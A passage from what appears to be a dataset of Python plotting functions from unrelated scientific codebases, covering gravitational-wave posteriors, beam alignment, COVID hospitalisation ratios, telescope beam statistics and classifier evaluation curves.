bx.set_xticks([])\n bx.set_yticks([])\n bx.set_xlabel(r'$\\rm Density$')\n plt.tight_layout()\n\n plt.show()\n fig.savefig(os.getcwd() + os.sep + 'DetTest1_plots' + os.sep +\\\n 'DetTest_Diagnostic_plot3.pdf')\n sys.exit()", "def plot_pdf(pop_name, pop_val, pop_file, full_pop_file, outdir='.'):\n try:\n plt.style.use(\n \"https://gist.githubusercontent.com/avivajpeyi/4d9839b1ceb7d3651cbb469bc6b0d69b/raw/4ee4a870126653d542572372ff3eee4e89abcab0/publication.mplstyle\")\n except Exception:\n pass\n\n plt.close('all')\n all = pd.read_csv(full_pop_file, sep=\" \")\n all['cos_theta_1'] = all['cos_tilt_1']\n all = process_samples(all)\n sub = pd.read_csv(pop_file, sep=\" \")\n sub = process_samples(sub)\n sub['cos_theta_1'] = sub['cos_tilt_1']\n\n fig, axes = plt.subplots(1, 2, figsize=(10, 5))\n for ax, l in zip(axes, [\"cos_theta_1\", \"cos_theta_12\"]):\n ax.hist(all[l], density=True, histtype='step', color=\"tab:blue\", label=\"ALL\", lw=2, alpha=0.8)\n ax.scatter(all[l], [0 for _ in all[l]], color=\"tab:blue\",marker=\"+\")\n ax.hist(sub[l], density=True, histtype='step', color=\"tab:purple\", label=\"HIGH SNR\", lw=2, alpha=0.6)\n ax.scatter(sub[l], [0 for _ in sub[l]], color=\"tab:purple\", marker=\"+\")\n\n x = np.linspace(-1, 1, 100)\n y1 = TruncatedNormal(mu=1, sigma=pop_val[0], minimum=-1, maximum=1).prob(x)\n y2 = TruncatedNormal(mu=1, sigma=pop_val[1], minimum=-1, maximum=1).prob(x)\n axes[1].plot(x, y2, color='tab:gray', zorder=-10, lw=3, label=\"TRUE\")\n axes[0].plot(x, y1, color='tab:gray', zorder=-10, lw=3)\n\n for i in range(len(axes)):\n if (i == 0):\n axes[i].set_xlabel(r\"$\\cos\\ \\theta_1$\")\n axes[i].set_ylabel(\"PDF\")\n else:\n axes[i].set_xlabel(r\"$\\cos\\ \\theta_{12}$\")\n axes[i].set_yticklabels([])\n axes[i].legend()\n axes[i].grid(False)\n axes[i].set_xlim(-1, 1)\n\n plt.suptitle(f\"POP {pop_name}\")\n plt.tight_layout()\n plt.savefig(f\"{outdir}/pop_trues_{pop_name}.png\")", "def analyse_plots(plot_dict, data_dict) :\n for component in [ '_x', '_y' ] :\n z_pos = array.array( 'd' )\n trans_pos = array.array( 'd' )\n errors = array.array( 'd' )\n zeros = array.array( 'd' )\n\n plot = plot_dict['beam_positions'+component]\n\n for i in range( plot.GetXaxis().GetNbins()+2 ) :\n projection = plot.ProjectionY( \\\n 'profile'+component+'_pro_'+str(i), i, i )\n if projection.GetEntries() == 0 :\n continue\n\n pro_mean, pro_mean_err, pro_std, pro_std_err = \\\n scifi.fit_gaussian( projection )\n\n errors.append( pro_mean_err )\n trans_pos.append( pro_mean )\n z_pos.append( data_dict['station_positions'][ i-6 ] )\n zeros.append(0.0)\n\n position_graph = ROOT.TGraphErrors( len(zeros), z_pos, trans_pos, \\\n zeros, errors )\n position_graph.SetName('beam_profile'+component)\n plot_dict['beam_profile'+component] = position_graph\n\n profile_x = plot_dict['beam_profile_x']\n profile_y = plot_dict['beam_profile_y']\n\n up_x_func = ROOT.TF1( \"up_fit_x\", \"pol1\", -5000.0, 0.0 )\n up_y_func = ROOT.TF1( \"up_fit_y\", \"pol1\", -5000.0, 0.0 )\n down_x_func = ROOT.TF1( \"down_fit_x\", \"pol1\", 0.0, 5000.0 )\n down_y_func = ROOT.TF1( \"down_fit_y\", \"pol1\", 0.0, 5000.0 )\n\n up_fit_x = profile_x.Fit( 'up_fit_x', \"QSR\" )\n up_fit_y = profile_y.Fit( 'up_fit_y', \"QSR\" )\n down_fit_x = profile_x.Fit( 'down_fit_x', \"QSR\" )\n down_fit_y = profile_y.Fit( 'down_fit_y', \"QSR\" )\n\n plot_dict['beam_profile_x_up_fit'] = up_x_func\n plot_dict['beam_profile_y_up_fit'] = up_y_func\n plot_dict['beam_profile_x_down_fit'] = down_x_func\n plot_dict['beam_profile_y_down_fit'] = 
down_y_func\n\n\n up_beam_gra_x = up_x_func.GetParameter(1)\n up_beam_gra_x_err = up_x_func.GetParError(1)\n up_beam_gra_y = up_y_func.GetParameter(1)\n up_beam_gra_y_err = up_y_func.GetParError(1)\n\n up_beam_pos_x = data_dict['station_positions'][-1]*up_beam_gra_x + up_x_func.GetParameter(0)\n up_beam_pos_x_err = up_x_func.GetParError(0)\n up_beam_pos_y = data_dict['station_positions'][-1]*up_beam_gra_y + up_y_func.GetParameter(0)\n up_beam_pos_y_err = up_y_func.GetParError(0)\n\n up_beam_rot_x = math.atan( up_beam_gra_x )\n up_beam_rot_x_err = up_beam_gra_x_err # Approx linear\n up_beam_rot_y = math.atan( up_beam_gra_y )\n up_beam_rot_y_err = up_beam_gra_y_err # Approx linear\n\n\n\n down_beam_gra_x = down_x_func.GetParameter(1)\n down_beam_gra_x_err = down_x_func.GetParError(1)\n down_beam_gra_y = down_y_func.GetParameter(1)\n down_beam_gra_y_err = down_y_func.GetParError(1)\n\n down_beam_pos_x = data_dict['station_positions'][1]*down_beam_gra_x + down_x_func.GetParameter(0)\n down_beam_pos_x_err = down_x_func.GetParError(0)\n down_beam_pos_y = data_dict['station_positions'][1]*down_beam_gra_y + down_y_func.GetParameter(0)\n down_beam_pos_y_err = down_y_func.GetParError(0)\n\n down_beam_rot_x = math.atan( down_beam_gra_x )\n down_beam_rot_x_err = down_beam_gra_x_err # Approx linear\n down_beam_rot_y = math.atan( down_beam_gra_y )\n down_beam_rot_y_err = down_beam_gra_y_err # Approx linear\n\n\n# down_pos_x = down_beam_pos_x - data_dict['station_positions'][1]*up_beam_gra_x + up_x_func.GetParameter(0)\n# down_pos_x_err = math.sqrt( up_x_func.GetParError(0)**2 + down_beam_pos_x_err**2 )\n# down_pos_y = down_beam_pos_y - data_dict['station_positions'][1]*up_beam_gra_y + up_y_func.GetParameter(0)\n# down_pos_y_err = math.sqrt( up_y_func.GetParError(0)**2 + down_beam_pos_y_err**2 )\n\n length = TRACKER_SEPARATION\n down_pos_x = down_beam_pos_x - ( up_beam_pos_x + length*up_beam_gra_x )\n down_pos_x_err = math.sqrt( up_beam_pos_x_err**2 + down_beam_pos_x_err**2 + (length*up_beam_gra_x_err)**2 )\n down_pos_y = down_beam_pos_y - ( up_beam_pos_y + length*up_beam_gra_y )\n down_pos_y_err = math.sqrt( up_beam_pos_y_err**2 + down_beam_pos_y_err**2 + (length*up_beam_gra_y_err)**2 )\n\n down_rot_x = down_beam_rot_x - up_beam_rot_x\n down_rot_x_err = math.sqrt( down_beam_rot_x_err**2 + up_beam_rot_x_err**2 )\n down_rot_y = down_beam_rot_y - up_beam_rot_y\n down_rot_y_err = math.sqrt( down_beam_rot_y_err**2 + up_beam_rot_y_err**2 )\n\n\n print\n print \"Incoming Beam Misalignments:\"\n print\n print \"Displacement and rotation of beam with respect to upstream tracker:\"\n print\n print \"X Position = {0:0.3f} +/- {1:0.3f} mm\".format( up_beam_pos_x, up_beam_pos_x_err )\n print \"Y Position = {0:0.3f} +/- {1:0.3f} mm\".format( up_beam_pos_y, up_beam_pos_y_err )\n print\n print \"X Rotation = {0:0.3f} +/- {1:0.3f} mrad\".format( up_beam_rot_x*1000.0, up_beam_rot_x_err*1000.0 )\n print \"Y Rotation = {0:0.3f} +/- {1:0.3f} mrad\".format( up_beam_rot_y*1000.0, up_beam_rot_y_err*1000.0 )\n print\n\n print\n print \"Downstream Tracker Beam Misalignments:\"\n print\n print \"Displacement and rotation of beam with respect to downstream tracker:\"\n print\n print \"X Position = {0:0.3f} +/- {1:0.3f} mm\".format( down_beam_pos_x, down_beam_pos_x_err )\n print \"Y Position = {0:0.3f} +/- {1:0.3f} mm\".format( down_beam_pos_y, down_beam_pos_y_err )\n print\n print \"X Rotation = {0:0.3f} +/- {1:0.3f} mrad\".format( down_beam_rot_x*1000.0, down_beam_rot_x_err*1000.0 )\n print \"Y Rotation = {0:0.3f} +/- {1:0.3f} 
mrad\".format( down_beam_rot_y*1000.0, down_beam_rot_y_err*1000.0 )\n print\n\n print\n print \"Downstream Tracker Alignment:\"\n print\n print \"Displacement and rotation of between the two trackers:\"\n print\n print \"X Position = {0:0.3f} +/- {1:0.3f} mm\".format( down_pos_x, down_pos_x_err )\n print \"Y Position = {0:0.3f} +/- {1:0.3f} mm\".format( down_pos_y, down_pos_y_err )\n print\n print \"X Rotation = {0:0.3f} +/- {1:0.3f} mrad\".format( down_rot_x*1000.0, down_rot_x_err*1000.0 )\n print \"Y Rotation = {0:0.3f} +/- {1:0.3f} mrad\".format( down_rot_y*1000.0, down_rot_y_err*1000.0 )\n print", "def plot_results(self, a):\n import matplotlib.pyplot as plt\n fig, axes = plt.subplots(nrows=len(a.data_vars), sharex='all', sharey='all')\n for ax, var in zip(axes, a.data_vars):\n data = a[var]\n plt.sca(ax)\n data.plot(x='time', cmap=plt.cm.viridis_r, yincrease=False, robust=True)\n plt.show()", "def plot_data(data, param_choice, args):\n \n ### set general plot properties\n \n savebase = '/usr/users/iff_th2/duman/Cells_in_LAMMPS/POVRAY/'\n #downlim = -1\n #uplim = sim.lx/4.\n num_ticks = 5\n ax_len = 1.0 # Length of one subplot square box\n ax_b = 0.0 # Beginning/offset of the subplot in the box\n ax_sep = 0.0 # Separation length between two subplots\n total_subplots_in_x = 1 # Total number of subplots \n fig = plt.figure()\n subp = misc_tools.Subplots(fig, ax_len, ax_sep, ax_b, total_subplots_in_x) \n ax0 = subp.addSubplot()\n \n name = ''\n pname = ''\n if param_choice == 'areak': \n name = 'AREAK'\n pname = name + '_eps_' + str(args.eps) + '_fp_' + str(args.fp) + \\\n '_kappa_' + str(args.kappa)\n xlab = '$\\kappa_A$'\n tit = '$\\epsilon=$' + str(args.eps) + ',$f_m=$' + str(args.fp) + \\\n ',$\\kappa=$' + str(args.kappa)\n elif param_choice == 'eps':\n name = 'EPS'\n pname = name + '_fp_' + str(args.fp) + '_areak_' + str(args.areak) + \\\n '_kappa_' + str(args.kappa)\n xlab = '$\\epsilon$'\n tit = '$f_m=$' + str(args.fp) + ',$\\kappa_A=$' + str(args.areak) + \\\n ',$\\kappa=$' + str(args.kappa) \n elif param_choice == 'fp':\n name = 'FP'\n pname = name + '_eps_' + str(args.eps) + '_areak_' + str(args.areak) + \\\n '_kappa_' + str(args.kappa)\n xlab = '$f_{m}$'\n tit = '$\\epsilon=$' + str(args.eps) + ',$\\kappa_A=$' + str(args.areak) + \\\n ',$\\kappa=$' + str(args.kappa) \n elif param_choice == 'kappa':\n name = 'KAPPA'\n pname = name + '_eps_' + str(args.eps) + '_fp_' + str(args.fp) + \\\n '_areak_' + str(args.areak)\n xlab = '$\\kappa$'\n tit = '$\\epsilon=$' + str(args.eps) + ',$f_m=$' + str(args.fp) + \\\n ',$\\kappa_A=$' + str(args.areak) \n base = savebase + name + '/'\n os.system(\"mkdir -p \" + base) \n \n ### plot \n\n subp = misc_tools.Subplots(fig, ax_len, ax_sep, ax_b, total_subplots_in_x) \n ax0 = subp.addSubplot()\n \n x = data.keys()\n y = [1 for j in range(len(data.keys()))]\n print x\n ax0.scatter(x, y)\n ax0.set_xscale('log')\n ax0.set_yscale('log')\n \n for j, p in enumerate(data.keys()):\n \n fname = data[p] \n \n if os.path.exists(fname):\n arr_hand = read_png(fname)\n \n zoom=0.099\n imagebox = OffsetImage(arr_hand, zoom=zoom)\n\n xy = [x[j], y[j]] # coordinates to position this image\n\n ab = AnnotationBbox(imagebox, xy,\n xybox=(0., -0.),\n xycoords='data',\n boxcoords=\"offset points\",frameon=1,pad=.1) \n \n ax0.add_artist(ab)\n \n ### title\n \n ax0.set_title(tit, fontsize=30)\n \n ### labels\n \n ax0.set_xlabel(xlab, fontsize=30)\n #ax0.set_ylabel(\"$F_{s}(q,\\\\Delta t)$\", fontsize=40)\n\n ### limits\n\n #ax0.set_xlim((-1, 15))\n ax0.set_ylim((0.9999, 
1.0001))\n \n ax0.grid(1, color='#cccccc', linestyle='--')\n ax0.set_frame_on(False)\n ax0.get_xaxis().tick_bottom()\n ax0.axes.get_yaxis().set_visible(False)\n xmin, xmax = ax0.get_xaxis().get_view_interval()\n ymin, ymax = ax0.get_yaxis().get_view_interval()\n ax0.add_artist(Line2D((xmin, xmax), (ymin, ymin), color='black', linewidth=2)) \n ### ticks\n \n #ax0.xaxis.set_ticks(np.linspace(0, 15, num_ticks, endpoint=True))\n #ax0.yaxis.set_ticks(np.linspace(0, uplim, num_ticks, endpoint=True))\n plt.setp(ax0.get_yticklabels(),visible=False) \n ax0.tick_params(axis='both', which='major', labelsize=30)\n \n ### legend\n\n# ax0.legend(bbox_to_anchor=(1.005, 0.,0.65, 1.), loc=2, borderaxespad=0., \\\n# prop={'size': 20}, mode=\"expand\", frameon=False)\n \n ### save \n \n savepath = base + \"images_per_\" + pname + \".pdf\"\n print savepath\n plt.savefig(savepath, dpi=300, bbox_inches='tight', pad_inches=0.08) \n fig.clf() \n \n return", "def multi_plot(data, fname=None):\n for entry in data['data']:\n plt.plot(entry['x'], entry['y'], label=entry['label'])\n\n plt.title(data['title'])\n plt.xlabel(data['x_label'])\n plt.ylabel(data['y_label'])\n\n #plt.legend(loc='best')\n\n Plotter.show(data['title'], fname=fname)", "def plot_sample(self):\n print(u'plot_sample()')\n data_set = self.data_sets[1]\n scenario = u'Greedy Search'\n titles = [u'Collaborative Filtering', u'Content-based']\n fig, axes = plt.subplots(1, 2, figsize=(10, 5))\n for i, rec_type in enumerate(data_set.missions):\n graph = data_set.folder_graphs + rec_type + '_' + str(15) + u'.txt'\n for strategy in Strategy.strategies:\n m = data_set.missions[rec_type][graph][strategy][scenario]\n m.compute_stats()\n ppl.plot(axes[i], np.arange(STEPS_MAX + 1),\n m.stats, label=strategy, linewidth=2)\n axes[i].set_xlabel(u'#Hops')\n axes[i].set_ylabel(u'Success Ratio')\n axes[i].set_ylim(0, 85)\n axes[i].set_xlim(0, STEPS_MAX * 1.01)\n axes[i].set_title(titles[i])\n ppl.legend(axes[i], loc=0)\n\n\n # plt.suptitle(u'Greedy Search on the BookCrossing for N=15',\n # size='xx-large', x=0.5)\n fig.subplots_adjust(left=0.08, right=0.97, top=0.9)\n\n plt.savefig('plots/sample.png')\n plt.savefig('plots/sample.pdf')", "def plot_prodata_psf(self,font_size=28,img_name='prodata_psf.pdf',img_id=0):\n rawimage = self.raw_image\n dataimage = self.data\n len_mask = self.lens_mask\n plu_mask_out = self.plu_mask\n\n fig, (ax1, ax2, ax3, ax4,ax5) = plt.subplots(1, 5, figsize=(19, 10))\n ax1.imshow((rawimage), origin='lower', cmap=\"gist_heat\")\n ax1.set_title('Original Image', fontsize=font_size)\n ax1.text(rawimage.shape[0] * 0.55, rawimage.shape[0] * 0.8, 'ID='+repr(img_id), size=12, color='white',\n weight=\"bold\")\n ax1.text(rawimage.shape[0] * 0.2, rawimage.shape[0] * 0.05, 'observation', size=20, color='white', weight=\"bold\")\n ax1.axis('off')\n #\n ax2.imshow((dataimage), origin='lower', cmap=\"gist_heat\")\n ax2.set_title('Image Data', fontsize=font_size)\n ax2.text(dataimage.shape[0] * 0.2, dataimage.shape[0] * 0.05, 'image data', size=20, color='white', weight=\"bold\")\n ax2.axis('off')\n #\n ax3.imshow(len_mask, origin='lower')\n ax3.set_title('Lens light', fontsize=font_size)\n ax3.axis('off')\n #\n ax4.imshow(plu_mask_out, origin='lower')\n ax4.set_title('Mask', fontsize=font_size)\n ax4.axis('off')\n#\n psf=self.psf\n ax5.imshow(np.log10(psf), origin='lower', cmap=\"gist_heat\")\n ax5.set_title('lg(PSF)', fontsize=font_size)\n ax5.axis('off')\n\n plt.show()\n fig.savefig(img_name)\n return 0", "def plot_actual_vs_predicted_by_equations(df, 
x_variable, y_variables, plot_title):\n #Plot results\n df.plot(x=x_variable, y=y_variables, title=plot_title)\n plt.show()", "def plot_data_stats(data_dict, data_bxtxn, data_dt):\n print(onp.mean(onp.sum(data_bxtxn, axis=1)), \"spikes/second\")\n f = plt.figure(figsize=(12,4))\n plt.subplot(141)\n plt.hist(onp.mean(data_bxtxn, axis=1).ravel()/data_dt);\n plt.xlabel('spikes / sec')\n plt.subplot(142)\n plt.imshow(data_dict['hiddens'][0,:,:].T)\n plt.xlabel('time')\n plt.ylabel('neuron #')\n plt.title('Sample trial rates')\n plt.subplot(143);\n plt.imshow(data_bxtxn[0,:,:].T)\n plt.xlabel('time')\n plt.ylabel('neuron #')\n plt.title('spikes')\n plt.subplot(144)\n plt.stem(onp.mean(onp.sum(data_bxtxn, axis=1), axis=0));\n plt.xlabel('neuron #')\n plt.ylabel('spikes / sec');\n return f", "def plot_all(show=True):\n fig, axes = plt.subplots(max_iterations, 1, figsize=(6, 12))\n for t in range(max_iterations):\n with open('results/%s/df_%d.pkl' % (id, t), 'rb') as f:\n df = pickle.load(f)\n with open('results/%s/w_%d.pkl' % (id, t), 'rb') as f:\n w = pickle.load(f)\n axes[t].hist2d(x=df['vision'], y=df['metab'], weights=w, density=True,\n bins=((xticks, yticks)), cmap='magma')\n axes[t].set_ylabel('max metabolism')\n axes[t].set_xticks(vision_domain)\n axes[t].set_yticks((2, 3, 4))\n axes[3].set_xlabel('max vision')\n fig.tight_layout()\n if show:\n plt.show()\n else:\n plt.savefig('results/%s/abc_results.pdf' % id)", "def plot(self, **kwargs):\n\n # get colors\n colors = kwargs.get(\"colors\", GW_OBSERVATORY_COLORS)\n\n # get Result samples\n self._samples = {\n label: value.posterior\n for label, value in self.results.items()\n if isinstance(value, Result)\n }\n\n # get Grid posteriors\n self._grids = {\n label: [value, value.ln_evidence] # store grid and log evidence\n for label, value in self.results.items()\n if isinstance(value, Grid)\n }\n\n # apply offsets for slightly nicer plots axes\n self.parameter_offsets = {parameter: 0.0 for parameter in self.parameters}\n if len(self._grids) == 0 and len(self._samples) == 1:\n for label in self._samples:\n for parameter in self.parameters:\n srange = [\n np.min(self._samples[label][parameter]),\n np.max(self._samples[label][parameter]),\n ]\n label_suffix = \"\"\n\n # offset values\n median = np.median(self._samples[label][parameter])\n relwidth = np.abs((srange[1] - srange[0]) / median)\n\n if relwidth < 1e-4:\n offsetstr = f\"{median:.4e}\"\n a, b = offsetstr.split(\"e\")\n\n if np.abs(int(b)) < 3:\n offsetstr = f\"{median:.4f}\"\n offset = float(offsetstr)\n else:\n offset = float(offsetstr)\n offsetstr = a + rf\"\\!\\times\\!10^{{{int(b)}}}\"\n\n self.parameter_offsets[parameter] = offset\n\n self._samples[label][parameter] -= offset\n label_suffix = rf\" [${{\\scriptstyle {offsetstr}}}$]\"\n\n self.latex_labels[parameter] += label_suffix\n\n colordicts = []\n for j, res in enumerate([self._samples, self._grids]):\n colordicts.append({})\n for i, key in enumerate(res):\n if key in colors:\n colordicts[-1][key] = colors[key]\n elif key.lower() == \"joint\":\n # if using \"Joint\" as the multi-detector analysis key, set the color to black\n colordicts[-1][key] = \"k\"\n else:\n # use PESummary color cycle\n colordicts[-1][key] = list(colorcycle)[\n (j * 2 + i) % len(colorcycle)\n ]\n\n # store original keywords arguments\n origkwargs = kwargs.copy()\n\n # plot samples\n fig = None\n if len(self._samples) > 0:\n kwargs[\"colors\"] = list(colordicts[0].values())\n if self._num_parameters == 1:\n fig = self._1d_plot_samples(**kwargs)\n elif 
self._num_parameters == 2 and self.plottype != \"corner\":\n fig = self._2d_plot_samples(**kwargs)\n else:\n fig = self._nd_plot_samples(**kwargs)\n\n # restore keywords\n kwargs = origkwargs\n\n if len(self._grids) > 0:\n kwargs[\"colors\"] = list(colordicts[1].values())\n if fig is not None and \"fig\" not in kwargs:\n kwargs[\"fig\"] = fig\n if self._num_parameters == 1:\n fig = self._1d_plot_grid(**kwargs)\n elif self._num_parameters == 2 and self.plottype != \"corner\":\n fig = self._2d_plot_grid(**kwargs)\n else:\n fig = self._nd_plot_grid(**kwargs)\n\n # add further figure information\n if self._num_parameters == 1:\n ax = fig.gca()\n\n # set figure bounds if outside defaults\n if self.parameters[0] in DEFAULT_BOUNDS:\n _set_axes_limits(ax, self.parameters[0], axis=\"x\")\n\n # add injection values\n if self.injection_parameters is not None:\n if self.injection_parameters[self.parameters[0]] is not None:\n ax.axvline(\n (\n self.injection_parameters[self.parameters[0]]\n - self.parameter_offsets[self.parameters[0]]\n ),\n color=kwargs.get(\"injection_color\", \"k\"),\n linewidth=1,\n )\n elif self._num_parameters == 2:\n if \"triangle\" in self.plottype:\n a1, a2, a3 = fig[1:]\n order = [\"x\", \"y\"] if self.plottype == \"triangle\" else [\"y\", \"x\"]\n params = (\n self.parameters[:2]\n if self.plottype == \"triangle\"\n else self.parameters[1::-1]\n )\n\n # set figure bounds if outside defaults\n for param, axes, axis in zip(params, [[a1, a2], [a2, a3]], order):\n for ax in axes:\n _set_axes_limits(ax, param, axis=axis)\n\n self.fig = fig\n return self.fig", "def ratio(gb_data, data_depcode, data_ratio_hospitalises,current_date, data_hospitalises, current_date_file, min_value_80p , nbhospitalises_80p) :\n start = time.time()\n fig, ax = plt.subplots(figsize=(12, 8))\n\n plt.title(f\"Ratio of in-hospital deaths to hospitalizations : {current_date}\", fontsize=20)\n plt.ylabel(\"Total number of deceases / Total number of hospitalized\")\n plt.xlabel(\"Total number of hospitalized\")\n\n for i, txt in enumerate(data_depcode):\n if (data_hospitalises[i] > data_hospitalises.max() * 0.20):\n ax.annotate(txt, (data_hospitalises[i], data_ratio_hospitalises[i]), xytext=(data_hospitalises[i] + 20, data_ratio_hospitalises[i])) \n\n plt.axhline(data_ratio_hospitalises.mean(), color='green', linestyle='--', label=f'average death ratio ({data_ratio_hospitalises.mean():.2f}%)')\n\n plt.axvline(min_value_80p, color='pink', linestyle='-', label=f\"80% of the number of hospitalized people in France are on the right side of the line ({nbhospitalises_80p:.0f} hospitalized)\")\n\n ax.scatter(data_hospitalises, data_ratio_hospitalises)\n\n ax.annotate('updated chart',xy=(1, 0), xytext=(-15, 10), fontsize=15,\n xycoords='axes fraction', textcoords = 'offset points',\n bbox=dict(facecolor = 'white', alpha = 0.9),\n horizontalalignment = 'right', verticalalignment = 'bottom')\n\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.0f%%'))\n plt.legend()\n\n current_date_file = gb_data['date'].max().strftime('%Y%m%d')\n end = time.time()\n print(\"Time spent on ratio plot: {0:.5f} s.\".format(end - start)) \n plt.show()", "def ResBeam_Stats_plot(n, header_bmaj, header_bmin): \n\n file_dir = 'SpectralCube_BeamLogs'\n basename = '/beamlog.image.restored.' + imagebase + field\n\n # use different basename for the Milky Way range\n if not glob.glob(file_dir + basename +'*.txt'):\n basename = '/beamlog.image.restored.' + imagebase + 'MilkyWay.' 
+ field\n\n \n BEAM_THRESHOLD = []\n \n title1 = 'Restoring beam bmaj standard deviation [arcsec]'\n plt_name1 = 'BmajStdev.png'\n saved_fig1 = fig_dir+'/'+plt_name1\n\n title2 = 'Restoring beam bmin standard deviation [arcsec]'\n plt_name2 = 'BminStdev.png'\n saved_fig2 = fig_dir+'/'+plt_name2\n\n title3 = 'Maximum ratio of beam area'\n plt_name3 = 'max_ratioBA.png'\n saved_fig3 = fig_dir+'/'+plt_name3\n\n title4 = 'Minimum ratio of beam area' \n plt_name4 = 'min_ratioBA.png'\n saved_fig4 = fig_dir+'/'+plt_name4\n \n params = {'axes.labelsize': 10,\n 'axes.titlesize': 10,\n 'font.size':10}\n\n pylab.rcParams.update(params)\n\n beamXPOS, beamYPOS = BeamPosition()\n fig1, ax1 = plt.subplots()\n fig2, ax2 = plt.subplots()\n fig3, ax3 = plt.subplots()\n fig4, ax4 = plt.subplots()\n \n for i in range(0,36):\n bnum = n[i]\n infile = file_dir + basename +'.beam%02d.txt'%(bnum)\n bmaj_stdev, bmin_stdev, beam_threshold, max_ratio_BA, min_ratio_BA = cal_ResBeam_Stats(infile, header_bmaj, header_bmin)\n BEAM_THRESHOLD.append(beam_threshold)\n\n ax1.scatter([beamXPOS[i]], [beamYPOS[i]], s=1400, edgecolors='black', facecolors='none')\n ax1.text(beamXPOS[i], beamYPOS[i]+0.02, n[i], va='center', ha='center')\n ax1.text(beamXPOS[i], beamYPOS[i]-0.02, round(bmaj_stdev, 3), va='center', ha='center', fontsize=8, color='blue')\n\n ax2.scatter([beamXPOS[i]], [beamYPOS[i]], s=1400, edgecolors='black', facecolors='none')\n ax2.text(beamXPOS[i], beamYPOS[i]+0.02, n[i], va='center', ha='center')\n ax2.text(beamXPOS[i], beamYPOS[i]-0.02, round(bmin_stdev,3), va='center', ha='center', fontsize=8, color='blue')\n\n maxplot = ax3.scatter([beamXPOS[i]], [beamYPOS[i]], s=1300, c=[max_ratio_BA], cmap='summer', edgecolors='black', vmin=0, vmax=1.1)\n ax3.text(beamXPOS[i], beamYPOS[i]+0.02, n[i], va='center', ha='center')\n ax3.text(beamXPOS[i], beamYPOS[i]-0.02, round(max_ratio_BA,3), va='center', ha='center', fontsize=8, color='blue')\n \n minplot = ax4.scatter([beamXPOS[i]], [beamYPOS[i]], s=1300, c=[min_ratio_BA], cmap='summer', edgecolors='black', vmin=0, vmax=1.1)\n ax4.text(beamXPOS[i], beamYPOS[i]+0.02, n[i], va='center', ha='center')\n ax4.text(beamXPOS[i], beamYPOS[i]-0.02, round(min_ratio_BA,3), va='center', ha='center', fontsize=8, color='blue')\n \n ax1.set_xlim(0,0.7)\n ax1.set_ylim(0,1.4)\n ax1.tick_params(axis='both',which='both', bottom=False,top=False,right=False,left=False,labelbottom=False, labelleft=False)\n ax1.set_title(title1)\n\n ax2.set_xlim(0,0.7)\n ax2.set_ylim(0,1.4)\n ax2.tick_params(axis='both',which='both', bottom=False,top=False,right=False,left=False,labelbottom=False, labelleft=False)\n ax2.set_title(title2)\n\n ax3.set_xlim(0,0.7)\n ax3.set_ylim(0,1.4)\n ax3.tick_params(axis='both',which='both', bottom=False,top=False,right=False,left=False,labelbottom=False, labelleft=False)\n ax3.set_title(title3)\n plt.colorbar(maxplot, ax=ax3)\n\n ax4.set_xlim(0,0.7)\n ax4.set_ylim(0,1.4)\n ax4.tick_params(axis='both',which='both', bottom=False,top=False,right=False,left=False,labelbottom=False, labelleft=False)\n ax4.set_title(title4)\n plt.colorbar(minplot, ax=ax4)\n\n fig1.savefig(saved_fig1, bbox_inches='tight')\n fig2.savefig(saved_fig2, bbox_inches='tight')\n fig3.savefig(saved_fig3, bbox_inches='tight')\n fig4.savefig(saved_fig4, bbox_inches='tight')\n\n plt.close('all')\n\n return saved_fig1, saved_fig2, plt_name1, plt_name2, saved_fig3, saved_fig4, plt_name3, plt_name4, BEAM_THRESHOLD", "def plot(model, results, filename):\n\n # c = model.compartments.get_one(id='c')\n #\n # rna_1 = 
model.species_types.get_one(id='rna_1').species.get_one(compartment=c)\n # rna_2 = model.species_types.get_one(id='rna_2').species.get_one(compartment=c)\n # rna_3 = model.species_types.get_one(id='rna_3').species.get_one(compartment=c)\n #\n pops = results.get('populations')\n time = pops.index\n pop_rna_1 = pops['rna_1[c]']\n pop_rna_2 = pops['rna_2[c]']\n pop_rna_3 = pops['rna_3[c]']\n\n pop_atp = pops['atp[c]']\n pop_gtp = pops['gtp[c]']\n pop_utp = pops['ctp[c]']\n pop_ctp = pops['utp[c]']\n\n pop_amp = pops['amp[c]']\n pop_gmp = pops['gmp[c]']\n pop_ump = pops['cmp[c]']\n pop_cmp = pops['ump[c]']\n\n print(pop_rna_1, pop_atp, pop_gtp, pop_utp, pop_ctp)\n\n fig1, axes1 = pyplot.subplots(nrows=3, ncols=1)\n\n axes1[0].plot(time / 3600, pop_rna_1)\n axes1[0].plot(time / 3600, pop_rna_2)\n axes1[0].plot(time / 3600, pop_rna_3)\n axes1[0].set_xlim((time[0] / 3600, time[-1] / 3600))\n axes1[0].set_ylim((0., 10.0))\n axes1[0].legend(loc='upper right')\n\n axes1[1].plot(time / 3600, pop_atp)\n axes1[1].plot(time / 3600, pop_gtp)\n axes1[1].plot(time / 3600, pop_utp)\n axes1[1].plot(time / 3600, pop_ctp)\n axes1[1].set_xlim((time[0] / 3600, time[-1] / 3600))\n # axes1[1].set_ylim((0., 10.0))\n axes1[1].legend(loc='upper right')\n\n axes1[2].plot(time / 3600, pop_amp)\n axes1[2].plot(time / 3600, pop_gmp)\n axes1[2].plot(time / 3600, pop_ump)\n axes1[2].plot(time / 3600, pop_cmp)\n axes1[2].set_xlim((time[0] / 3600, time[-1] / 3600))\n # axes1[2].set_ylim((0., 10.0))\n axes1[2].legend(loc='upper right')\n\n fig1.savefig(filename.format('species'))\n pyplot.close(fig1)", "def pratn_writer(clf, y_true, y_prob, eval_folder, i=''):\n if type(y_true[0]) is not np.ndarray: y_true = [y_true]\n if type(y_prob[0]) is not np.ndarray: y_prob = [y_prob]\n\n img_dir = eval_folder+'/images/'\n if not os.path.exists(img_dir):\n os.makedirs(img_dir)\n\n clf_name = str(clf)[:str(clf).index('(')]+str(i)\n\n enum_list = range(0, len(y_true))\n\n fig, ax1 = plt.subplots()\n ax1.set_xlabel('percent of population')\n ax1.set_ylabel('precision', color='b')\n ax2 = ax1.twinx()\n ax2.set_ylabel('recall', color='r')\n\n mean_prec = 0.0\n mean_rec = 0.0\n mean_pct_above = np.linspace(0,1,1000)\n\n for i in enum_list:\n prec, rec, thres = metrics.precision_recall_curve(y_true[i], y_prob[i])\n prec = prec[:-1]\n rec = rec[:-1]\n skip_size = int(thres.shape[0]/1000.0)\n if skip_size == 0: skip_size = 1\n\tplotting_thres = thres[0::skip_size][::-1]\n plotting_prec = prec[0::skip_size][::-1]\n plotting_rec = rec[0::skip_size][::-1]\n\n how_many = float(len(y_true[i]))\n\n pct_above = [(y_prob[i][y_prob[i] >= 